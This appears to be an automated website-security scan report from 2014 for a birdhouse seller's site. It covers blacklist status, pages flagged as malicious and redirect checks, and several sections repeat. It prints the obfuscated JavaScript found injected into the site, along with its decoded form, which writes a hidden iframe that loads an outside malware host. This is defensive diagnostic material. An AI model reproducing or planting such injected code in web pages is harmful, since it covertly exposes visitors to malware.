Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=uneekbirdhouses.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://uneekbirdhouses.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://uneekbirdhouses.com/ | 200 OK Content-Length: 1019 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('o k(3){1 7=\'s\';1 5=e g();c(1 i=0;i<q;i++){5[7.b(i>>4)+7.b(i&l)]=m.n(i)}d(!3.r(/^[a-t-9]*$/i))h y;d(3.f%2)3=\'0\'+3;1 8=3.f;1 6=e g();1 j=0;c(1 i=0;i<8;i+=2){6[j++]=5[3.v(i,2)]}h 6.x(\'\')}w.p(k(\'u\ Decoded script: function hDcd(data){var b16_digits='0123456789abcdef';var b16_map=new Array();for(var i=0;i<256;i++){b16_map[b16_digits.charAt(i>>4)+b16_digits.charAt(i&15)]=String.fromCharCode(i)}if(!data.match(/^[a-f0-9]*$/i))return false;if(data.length%2)data='0'+data;var ll=data.length;var result=new Array();var j=0;for(var i=0;i<ll;i+=2){result[j++]=b16_map[data.substr(i,2)]}return result.join('')}document.write(hDcd('3c646976207374796c653d22706f736974696f6e3a206162736f6c7574653b206c65 <div style="position: absolute; left: -1997px; top: -2995px;"><iframe width="2" height="4" src="http://ahftytdzrm.myftp.org/i.php?go=1"></iframe></div> Antivirus reports:
| ||
http://uneekbirdhouses.com/test404page.js | 200 OK Content-Length: 1019 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('o k(3){1 7=\'s\';1 5=e g();c(1 i=0;i<q;i++){5[7.b(i>>4)+7.b(i&l)]=m.n(i)}d(!3.r(/^[a-t-9]*$/i))h y;d(3.f%2)3=\'0\'+3;1 8=3.f;1 6=e g();1 j=0;c(1 i=0;i<8;i+=2){6[j++]=5[3.v(i,2)]}h 6.x(\'\')}w.p(k(\'u\ Decoded script: function hDcd(data){var b16_digits='0123456789abcdef';var b16_map=new Array();for(var i=0;i<256;i++){b16_map[b16_digits.charAt(i>>4)+b16_digits.charAt(i&15)]=String.fromCharCode(i)}if(!data.match(/^[a-f0-9]*$/i))return false;if(data.length%2)data='0'+data;var ll=data.length;var result=new Array();var j=0;for(var i=0;i<ll;i+=2){result[j++]=b16_map[data.substr(i,2)]}return result.join('')}document.write(hDcd('3c646976207374796c653d22706f736974696f6e3a206162736f6c7574653b206c65 <div style="position: absolute; left: -1997px; top: -2995px;"><iframe width="2" height="4" src="http://ahftytdzrm.myftp.org/i.php?go=1"></iframe></div> Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: uneekbirdhouses.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Oct 2014 16:11:37 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
GET / HTTP/1.1
Host: uneekbirdhouses.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Oct 2014 16:11:37 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: uneekbirdhouses.com
Referer: http://www.google.com/search?q=uneekbirdhouses.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: uneekbirdhouses.com
Referer: http://www.google.com/search?q=uneekbirdhouses.com
Result:
The result is similar to the first query. There are no suspicious redirects found.